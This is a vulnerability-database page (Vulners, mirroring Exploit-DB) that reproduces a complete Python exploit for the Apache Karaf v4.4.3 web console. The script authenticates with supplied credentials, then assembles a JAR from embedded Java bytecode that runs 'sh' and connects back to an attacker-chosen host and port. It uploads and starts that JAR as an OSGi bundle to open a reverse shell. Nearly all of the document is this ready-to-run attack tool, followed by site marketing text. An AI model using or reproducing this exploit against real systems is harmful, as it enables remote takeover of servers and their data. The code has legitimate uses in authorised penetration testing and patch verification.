Vulners
Lucene search
Karaf v4.4.3 Console - RCE
🗓️ 16 Mar 2024 00:00:00Reported by Andrzej Olchawa, Milenko StarcikType 
exploitdb🔗 www.exploit-db.com👁 314 Views
#!/usr/bin/python
# Exploit Title: [Karaf v4.4.3 Console RCE]
# Date: [2023-08-07]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-karaf-exploits.git]
# Vendor Homepage: [https://karaf.apache.org]
# Software Link: [https://karaf.apache.org/download.html]
# Version: [4.4.3]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 \
# --lhost=192.168.0.100 --lport=4444 \
# --creds=karaf:karaf
"""
This tool will let you open a reverse shell from the system
that is running Karaf Console",
"""
import argparse
import base64
import io
import re
import zipfile
import requests
# Content of the MANIFEST.MF file.
MANIFEST_CONTENT = \
"Bundle-Name: RevShell\n" \
"Bundle-Description: Bundle openning a reverse shell connection.\n" \
"Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \
"Bundle-Vendor: VisionSpace\n" \
"Bundle-Version: 1.0.0\n" \
"Import-Package: org.osgi.framework\n" \
"Bundle-Activator: com.visionspace.osgi.revshell.Activator"
# Activator.class bytecode template.
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \
b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \
b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \
b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \
b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \
b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \
b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \
b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \
b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \
b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \
b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \
b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \
b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \
b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \
b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \
b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \
b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \
b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \
b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \
b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \
b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \
b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \
b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \
b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \
b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \
b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \
b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \
b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \
b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \
b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \
b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \
b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \
b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \
b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \
b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \
b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \
b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \
b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \
b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \
b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \
b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \
b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \
b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \
b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \
b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \
b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \
b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \
b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \
b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \
b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \
b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \
b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \
b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \
b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \
b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \
b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \
b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \
b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \
b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \
b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \
b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \
b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \
b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \
b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \
b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \
b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \
b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \
b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \
b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \
b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \
b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \
b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \
b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \
b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \
b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \
b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \
b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \
b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \
b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \
b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \
b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \
b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \
b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \
b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \
b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \
b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \
b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \
b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \
b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \
b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \
b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \
b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \
b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \
b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \
b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \
b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \
b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \
b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \
b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \
b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \
b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \
b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \
b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \
b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \
b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \
b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \
b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \
b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \
b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \
b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \
b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \
b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \
b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \
b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \
b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \
b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \
b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \
b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \
b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \
b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \
b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \
b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \
b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \
b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \
b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \
b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \
b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \
b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \
b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \
b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \
b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \
b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \
b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \
b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \
b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \
b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \
b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \
b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \
b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \
b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \
b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \
b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \
b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \
b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \
b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \
b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \
b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \
b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \
b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \
b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \
b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \
b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \
b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \
b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \
b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \
b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \
b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \
b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \
b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \
b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \
b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \
b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \
b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \
b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \
b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \
b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \
b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \
b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \
b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \
b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \
b"\x32"
# Items to be replaces within the bytecode of Activator.class
# <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e>
ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e"
# <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e>
ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e"
def parse():
"""
This function parses the command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="Karaf-Console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running Karaf Console",
epilog="Happy Hacking! :)",
)
parser.add_argument("--rhost", dest="rhost",
help="remote host", type=str, required=True)
parser.add_argument("--rport", dest="rport",
help="remote port", type=int, required=True)
parser.add_argument("--lhost", dest="lhost",
help="local host", type=str, required=True)
parser.add_argument("--lport", dest="lport",
help="local port", type=int, required=True)
parser.add_argument("--creds", dest="creds",
help="credentials in format <username:password>",
type=str, required=True)
parser.add_argument("--version", action="version",
version="%(prog)s 0.1.0")
return parser.parse_args()
def extract_jsessionid(cookie):
"""
This function extracts the JSESSIONID from the cookie string.
"""
jsessionid = None
regex = re.findall("JSESSIONID=([^;]+)", cookie)
if len(regex) > 0:
jsessionid = regex[0]
return jsessionid
def authenticate(target, basic_auth):
"""
This function connects to the URL and retrieves the JSESSIONID
based on the Basic Authorization.
"""
jsessionid = None
headers = {
"Authorization": basic_auth
}
response = requests.get(target, headers=headers,
allow_redirects=False, timeout=10)
if (response.status_code == 302 and response.headers["Set-Cookie"]):
jsessionid = extract_jsessionid(response.headers["Set-Cookie"])
return jsessionid
def generate_payload(lhost, lport):
"""
This function generates the payload.
It replaces the template payload with the `lhost` and `lport` arguments.
"""
payload = None
lhost_byte_array = bytearray()
lhost_byte_array.append(len(lhost))
lhost_byte_array.extend(map(ord, lhost))
activator_class_bytecodes = ACTIVATOR_CLASS_BYTECODE_TEMPLATE.replace(
ACTIVATOR_CLASS_LHOST_TAG, lhost_byte_array)
lport_str = str(lport)
lport_byte_array = bytearray()
lport_byte_array.append(len(lport_str))
lport_byte_array.extend(map(ord, lport_str))
activator_class_bytecodes = activator_class_bytecodes.replace(
ACTIVATOR_CLASS_LPORT_TAG, lport_byte_array)
jar_bytes = io.BytesIO()
with zipfile.ZipFile(jar_bytes, "w", zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr("com/visionspace/osgi/revshell/Activator.class",
activator_class_bytecodes)
zip_file.writestr("META-INF/MANIFEST.MF", MANIFEST_CONTENT)
payload = jar_bytes.getvalue()
return payload
def deploy_payload(target, basic_auth, jsessionid, payload):
"""
This function connects to the Karaf Console and deployes the payload.
"""
success = False
url = f"{target}/bundles"
cookies = {
"JSESSIONID": jsessionid
}
headers = {
"Authorization": basic_auth
}
files = {
"bundlefile": (
"revshell.jar", payload, "application/x-java-archive")
}
data = {
"action": "install",
"bundlestart": "start",
"bundlestartlevel": 80
}
response = requests.post(url, headers=headers, cookies=cookies,
files=files, data=data, timeout=10,
allow_redirects=False)
if response.status_code == 302:
success = True
return success
def generate_basic_auth(creds):
"""
This function generates the Basic Authorization string based
on the credentials.
"""
creds_base64 = base64.b64encode(creds.encode()).decode()
basic_auth = f"Basic {creds_base64}"
return basic_auth
def create_target_url(rhost, rport):
"""
This function creates a target URL.
"""
target_url = f"http://{rhost}:{rport}/system/console"
return target_url
def main(args):
"""
Main function.
"""
target = create_target_url(args.rhost, args.rport)
print("[*] Login...")
basic_auth = generate_basic_auth(args.creds)
jsessionid = authenticate(target, basic_auth)
if jsessionid:
print("[+] Session established.")
print("[*] Generating payload...")
payload = generate_payload(args.lhost, args.lport)
if payload:
print("[*] Deploying payload...")
if deploy_payload(target, basic_auth, jsessionid, payload):
print("[+] Done.")
else:
print("[-] Failed to deploy the payload!")
else:
print("[-] Failed to generate the payload!")
else:
print("[-] Login failed!")
if __name__ == "__main__":
main(parse())Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Mar 2024 00:00Current
7.4High risk
Vulners AI Score7.4